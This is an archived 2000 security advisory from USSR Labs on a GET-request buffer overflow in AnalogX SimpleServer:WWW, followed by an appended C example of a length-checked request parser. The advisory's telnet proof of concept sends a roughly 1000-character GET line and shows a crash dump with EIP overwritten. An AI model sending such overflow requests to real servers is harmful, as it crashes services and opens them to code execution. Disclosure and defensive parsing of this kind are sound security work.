labs29.html
Posted Feb 9, 2000

USSR Advisory #29 - Local / Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW HTTP Server v1.1

tags | remote, web, overflow, local
MD5 | 9d1fa2807b06e8fe862808a7755ecb23

<html>
<head>
<title>u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000" link="#486090" vlink="#485888" alink="#405888">
<table border="0" width="75%" cellspacing="20" cellpadding="20" height="576">
<tr>
<td height="941">
<center>
<table border="0" cellspacing="2" cellpadding="2" width="61%" height="602">
<tr>
<td colspan="2" align="LEFT" valign="MIDDLE" bgcolor="#309880" height="24">
<p><font face="Verdana" size="+1" color="#FFFFFF"> <a name="org"></a>Local
/ Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW
HTTP Server v1.01</font></p>
</td>
</tr>
<tr>
<td width="12%" align="LEFT" valign="TOP" height="5">&nbsp;</td>
<td width="88%" align="LEFT" valign="TOP" height="5">&nbsp;</td>
</tr>
<tr>
<th width="12%" align="LEFT" valign="TOP" height="17">
<p>AnalogX SimpleServer</p>
</th>
<td width="88%" align="LEFT" valign="TOP" height="17"><font face="Arial, Helvetica, sans-serif" size="2">
AnalogX SimpleServer:WWW HTTP Server v1.01</font></td>
</tr>
<tr>
<th width="12%" align="LEFT" valign="TOP" height="456">
<p>&nbsp;</p>
</th>
<td width="88%" align="LEFT" valign="TOP" height="456">
<pre>

USSR Advisory Code: <b>USSR-99029
</b>

<b>Release Date:
</b>December 31, 1999 [5/5] (not the original one), original [5/5]
will be released 15/01/1900 :)


<b>Systems Affected:
</b>AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly other versions.


<b>About The Software:
</b>Introducing AnalogX SimpleServer:WWW, the first in a series of simple to use yet
powerful servers! This webserver is SO easy to use, about the only thing you need
to know how to do is drag and drop files; then just click on the 'Start' button, and
your webserver is up and running, serving your pages to the world!
SimpleServer:WWW supports MIME file typing, CGI, common log format,
and multi-hosting, just to name a few! If you've always wanted a compact,
easy to use, versatile webserver, then your prayers have been answered.


<b>THE PROBLEM
</b>

UssrLabs found a local / remote buffer overflow. The code that handles GET commands
has an unchecked buffer that will allow arbitrary code to be executed if it is
overflowed.


Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html


<b>Example
</b>[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 &lt;enter&gt;&lt;enter&gt;

Where (buffer) is approx. 1000 characters. At this point the server overflows.

On the remote machine, someone will see something like this:

HTTP caused an invalid page fault in
module &lt;unknown&gt; at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855 00afffbc 00af0114
bff87fe9 00af012c 00afffbc 00af0148 00af0104 41414141 00af02f0

<b>Vendor Status:
</b>Informed.

Vendor Url: http://www.analogx.com/
Program Url: http://www.analogx.com/contents/download/network/sswww.htm

<b>Credit:</b> USSRLABS

<b>SOLUTION
</b>Fixed in version 1.02.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock Tellier,
Technotronic and Wiretrip.</pre>
</td>
</tr>
</table>
</center>
</td>
</tr>
</table>
</body>
</html>
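
An added example, not part of the USSR Labs advisory or AnalogX's code: a C request-line parser that performs the length check the advisory describes as missing from the GET handler, answering an overlong URI with status 414 instead of copying it. The 256-byte buffer, the function names and the filler-based sample input are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define URI_BUF 256 /* assumed size; the server's real buffer size is not on the page */
enum req_status { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Parse "GET <uri> HTTP/x.y" from a request line of known length. The URI is
 * copied into out[] only after its length has been checked against out_size. */
enum req_status parse_get_line(const char *line, size_t len,
                               char *out, size_t out_size)
{
    const char *uri, *sp;
    size_t ulen;

    if (out == NULL || out_size == 0)
        return REQ_BAD;
    out[0] = '\0';
    if (line == NULL || len <= 4 || memcmp(line, "GET ", 4) != 0)
        return REQ_BAD;
    uri = line + 4;
    sp = memchr(uri, ' ', len - 4);              /* end of the URI token */
    if (sp == NULL || sp == uri)
        return REQ_BAD;
    ulen = (size_t)(sp - uri);
    if (ulen >= out_size)                        /* no room for URI plus NUL */
        return REQ_URI_TOO_LONG;
    if (len - (size_t)(sp - line) < 6 || memcmp(sp + 1, "HTTP/", 5) != 0)
        return REQ_BAD;
    memcpy(out, uri, ulen);                      /* bounded by the check above */
    out[ulen] = '\0';
    return REQ_OK;
}

/* Constructed input: "GET /" + n filler bytes + " HTTP/1.1". */
enum req_status check_filler_uri(size_t n)
{
    static char line[4096];
    char uri[URI_BUF];

    if (n > sizeof line - 16)
        return REQ_BAD;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, " HTTP/1.1", 9);
    return parse_get_line(line, 5 + n + 9, uri, sizeof uri);
}

int main(void)
{
    printf("%d %d\n", (int)check_filler_uri(10), (int)check_filler_uri(1000));
    return 0;
}
```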
